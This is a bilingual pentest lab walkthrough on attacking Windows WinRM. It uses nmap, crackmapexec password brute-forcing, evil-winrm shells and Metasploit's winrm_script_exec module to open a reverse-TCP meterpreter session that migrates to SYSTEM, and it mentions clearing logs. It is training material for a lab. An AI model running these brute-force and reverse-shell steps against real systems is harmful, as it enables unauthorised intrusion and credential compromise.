Exploiting WinRM
Windows 远程管理 (WinRM) 是一种 Windows 远程管理协议,可用于通过 HTTP(S) 促进对 Windows 系统的远程访问。
微软在 Windows 中实施了 WinRM,以使系统管理员的生活更轻松。
WinRM 通常以下列方式使用:
- 远程访问本地网络上的 Windows 主机并与之交互。
- 在 Windows 系统上远程访问和执行命令。
- 远程管理和配置 Windows 系统。
- WinRM 通常使用 TCP 端口 5985 和 5986 (HTTPS)。
WinRM 通过各种形式的身份验证实现系统间通信的访问控制和安全。
我们可以利用一个名为“crackmapexec”的实用程序在 WinRM 上执行暴力破解,以识别用户及其密码,并在目标系统上执行命令。
我们还可以使用名为“evil-winrm”的 ruby 脚本来获取目标系统上的命令 shell 会话。
Demo: Exploiting WinRM
WinRM is a feature that exists within Windows, However, it is not configured to run by default and needs to be explicitly configured and enabled in order for it to work and in order for you to utilize it.
1
Target IP Address: 10.2.18.45
1
nmap -sV 10.2.18.45
Don’t pay attention to actual banner or service version that displays here, because nmap or other Windows systems don’t explicitly have a banner telling you this is WinRM. We do know WinRM is running on this port.
1
nmap -sV -p 5985 10.2.18.45
Brute Forcing & Password Spraying
1
2
3
4
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
WinRM Protocol Password spraying
1
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Why are we only targeting the administrator account, let’s take a few things into consideration:
Firstly, On Windows, administrator account is definitely there, because it is the first account that’s created when you installed Windows.
Secondly, The administrator account is typically the user account that is going to be used to access by system administrator for obvious reason.
Thirdly, If we gain access to the administrator account that means we have elevated privileges, we not have to go through the process of elevating our privileges manually.
1
2
3
crackmapexec winrm 10.2.18.45 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
WINRM 10.2.18.45 5985 NONE [*] http://10.2.18.45:5985/wsman
It actually connects to WINRM, don’t worry it tells you that using the wsman or the wsman service, because winRM is implementation of wsman or Windows Management or Windows Management API.
We can utilize crackmapexec to execute arbitary Windows command on the target.
Execute Command using WinRM
1
2
3
4
5
#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 ROGER [+] GOLD\user:password (Pwn3d!)
WINRM 192.168.255.131 5985 ROGER [+] Executed command
WINRM 192.168.255.131 5985 ROGER gold\user
1
crackmapexec winrm 10.2.18.45 -u administrator -p tinkerbell -x "whoami"
Enumerate all the information to this particular system:
1
crackmapexec winrm 10.2.18.45 -u administrator -p tinkberbell -x "systeminfo"
We have not utilized any exploit code or the exploited vulnerability within WinRM, we simply perform the brute-force attack and we now utilizing the WinRM protocol to legitimately execute commands on the target system. And of course executing commands on the target system will have its own number of logs which you can clear very easily, but this is relatively safe because if WinRM is enabled on the target if firewall rules or exceptions will be added so you can communicate with the system via winRM without any restriction.
Obtain a command shell session:
We get a command shell facilitated through powershell.
1
2
3
4
5
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.2.18.45
PS C:\User\Administrator\Documents> whoami
PS C:\User\Administrator\Documents> ipconfig
PS C:\User\Administrator\Documents> net user
WinRM Script Exec Remote Code Execution
WinRM Script Exec 远程代码执行
此模块使用有效凭据登录 WinRM 服务并执行有效负载。它有两种可用的有效负载交付方法:Powershell 2.0 和 VBS CmdStager。该模块将检查 Powershell 2.0 是否可用,如果可用,则使用该方法。否则,它会退回到不那么隐蔽的 VBS CmdStager。重要提示:如果使用 Powershell 方法针对 x64 系统,您必须选择 x64 有效负载。x86 有效负载永远不会返回。
It is a 64 bit meterpreter session because it migrated to 64 bit process. And then we get the privileges associated with this process.
1
2
3
4
5
6
7
8
9
10
11
12
13
service postgresql start && msfconsole
search winrm_script
use exploit/windows/winrm/winrm_script_exec
show option
set RHOSTS 10.2.18.45
set FORCE_VBS true
set USERNAME administrator
set PASSWORD tinkerbell
exploit
meterpreter > sysinfo
meterpreter > getuid
WinRM: Exploitation with Metasploit(WinRM:利用 Metasploit)
概述
为您提供了一台 Kali GUI 机器和一台运行 WinRM 服务器的目标机器。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。
你的任务是使用 Kali 机器上可用的工具对 WinRM 服务进行指纹识别,然后使用 Metasploit 框架漏洞利用和辅助模块来利用漏洞。
目标:利用 WinRM 服务获取目标上的meterpreter并检索标志!
指示:
你的 Kali 机器有一个 IP 地址为 10.10.XY 的接口运行“ip addr”以了解 X 和 Y 的值。
目标机器的 IP 地址在文件“/root/Desktop/target”中提到
不要攻击位于 IP 地址 192.VW1 和 10.10.X.1 的网关
使用的词典:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
我自己的思路
1
Target IP Address : 10.3.27.236
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@attackdefense:~# nmap -sV 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:14 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.09 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@attackdefense:~# nmap -p- 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:16 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 334.69 seconds
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# nmap -sV -p 5985 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:25 IST
Nmap scan report for 10.3.27.236
Host is up (0.0030s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds
1
crackmapexec winrm 10.3.27.236 -u /usr/share/metasploit-framework/data/wordlists/common_users.txt -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
1
2
3
WINRM 10.3.27.236 5985 NONE [-] None\administrator:elizabeth "Failed to authenticate the user administrator with ntlm"
WINRM 10.3.27.236 5985 NONE [-] None\administrator:hottie "Failed to authenticate the user administrator with ntlm"
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WinRM protocol Command execution
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -X whoami
WINRM 10.3.27.236 5985 NONE [*] http://10.3.27.236:5985/wsman
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WINRM 10.3.27.236 5985 NONE [+] Executed command
WINRM 10.3.27.236 5985 NONE server\administrator
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x ipconfig
WINRM 10.3.27.236 5985 NONE [*] http://10.3.27.236:5985/wsman
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WINRM 10.3.27.236 5985 NONE [+] Executed command
WINRM 10.3.27.236 5985 NONE
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : us-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
IPv4 Address. . . . . . . . . . . : 10.3.27.236
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.3.16.1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x "systeminfo"
WINRM 10.3.27.236 5985 NONE [*] http://10.3.27.236:5985/wsman
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WINRM 10.3.27.236 5985 NONE [+] Executed command
WINRM 10.3.27.236 5985 NONE
Host Name: SERVER
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: EC2
Registered Organization: Amazon.com
Product ID: 00430-00000-00000-AA975
Original Install Date: 10/1/2020, 2:03:19 PM
System Boot Time: 9/17/2022, 12:42:08 PM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version: Xen 4.2.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,096 MB
Available Physical Memory: 3,188 MB
Virtual Memory: Max Size: 5,504 MB
Virtual Memory: Available: 4,731 MB
Virtual Memory: In Use: 773 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\SERVER
Hotfix(s): 20 Hotfix(s) Installed.
[01]: KB4570720
[02]: KB4470502
[03]: KB4470788
[04]: KB4480056
[05]: KB4493510
[06]: KB4494174
[07]: KB4499728
[08]: KB4504369
[09]: KB4512577
[10]: KB4512937
[11]: KB4521862
[12]: KB4523204
[13]: KB4539571
[14]: KB4549947
[15]: KB4558997
[16]: KB4561600
[17]: KB4562562
[18]: KB4566424
[19]: KB4570332
[20]: KB4570333
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.3.16.1
IP address(es)
[01]: 10.3.27.236
[02]: fe80::cda1:e4e1:4b3a:b51d
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@attackdefense:/opt/evil-winrm# ls
CHANGELOG.md CODE_OF_CONDUCT.md CONTRIBUTING.md Dockerfile Gemfile Gemfile.lock LICENSE README.md evil-winrm.rb resources
root@attackdefense:/opt/evil-winrm# evil-winrm.rb -i 10.3.27.236 -u administrator -p tinkerbell
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
server\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : us-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
IPv4 Address. . . . . . . . . . . : 10.3.27.236
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.3.16.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator auditor DefaultAccount
demo Guest sysadmin
WDAGUtilityAccount
The command completed with one or more errors.
WinRM Script Exec Remote Code Execution
WinRM Script Exec Remote Code Execution
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. The module will check if Powershell 2.0 is available, and if so uses that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.
1
Target IP Address : 10.0.28.36
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search winrm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_auth_methods normal No WinRM Authentication Method Detection
1 auxiliary/scanner/winrm/winrm_cmd normal No WinRM Command Runner
2 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
3 auxiliary/scanner/winrm/winrm_wql normal No WinRM WQL Query Runner
4 exploit/windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution
Interact with a module by name or index, for example use 4 or use exploit/windows/winrm/winrm_script_exec
msf5 > use exploit/windows/winrm/winrm_script_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/winrm/winrm_script_exec) > show options
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes A specific username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf5 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf5 exploit(windows/winrm/winrm_script_exec) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 exploit(windows/winrm/winrm_script_exec) > set USERNAME administrator
USERNAME => administrator
msf5 exploit(windows/winrm/winrm_script_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
[*] Sending stage (176195 bytes) to 10.0.28.36
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.0.28.36:49751) at 2022-09-17 19:41:07 +0530
[*] Session ID 1 (10.10.16.4:4444 -> 10.0.28.36:49751) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is katzx.exe (3612) as: SERVER\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (896)
[+] Successfully migrated to svchost.exe (896) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
meterpreter > sysinfo
Computer : SERVER
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat c:\\flag.txt
3c716f95616eec677a7078f92657a230
解决方案
此实验室的解决方案可在以下手册中找到: https://assets.ine.com/labs/ad-manuals/walkthrough-2026.pdf
WinRM Authentication Method Detection
WinRM Script Exec Remote Code Execution
参照解决方案
1
2
3
4
5
6
7
8
9
10
11
12
13
root@attackdefense:~# nmap --top-port 7000 10.0.28.36
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 20:00 IST
Nmap scan report for 10.0.28.36
Host is up (0.0030s latency).
Not shown: 6995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 36.48 seconds
WinRM 登录实用程序
此模块尝试对 WinRM 服务进行身份验证。它目前仅在远程端允许协商(NTLM)身份验证时才有效。目前不支持 Kerberos。请注意:要在没有 SSL 的情况下使用此模块,必须设置“AllowUnencrypted”winrm 选项。否则调整端口并根据需要在模块中设置 SSL 选项。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > use auxiliary/scanner/winrm/winrm_login
msf5 auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 auxiliary(scanner/winrm/winrm_login) > run
[+] 10.0.28.36:5985 - Login Successful: WORKSTATION\administrator:tinkerbell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_login) >
WinRM Authentication Method Detection
WinRM 身份验证方法检测
该模块向 HTTP/HTTPS 服务发送请求以查看它是否是 WinRM 服务。如果它是 WinRM 服务,它还会收集支持的身份验证方法。
1
Target IP Address : 10.0.20.140
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > show options
Module options (auxiliary/scanner/winrm/winrm_auth_methods):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run
[+] 10.0.20.140:5985: Negotiate protocol supported
[+] 10.0.20.140:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
WinRM 命令运行程序
该模块使用 WinRM 服务运行任意 Windows 命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > show options
Module options (auxiliary/scanner/winrm/winrm_cmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ipconfig /all yes The windows command to run
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME yes The username to authenticate as
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD whoami
CMD => whoami
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME administrator
USERNAME => administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > run
[+] 10.0.20.140:5985 : server\administrator
[+] Results saved to /root/.msf4/loot/20220917210947_default_10.0.20.140_winrm.cmd_result_789998.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_cmd) >
WinRM Script Exec Remote Code Execution
1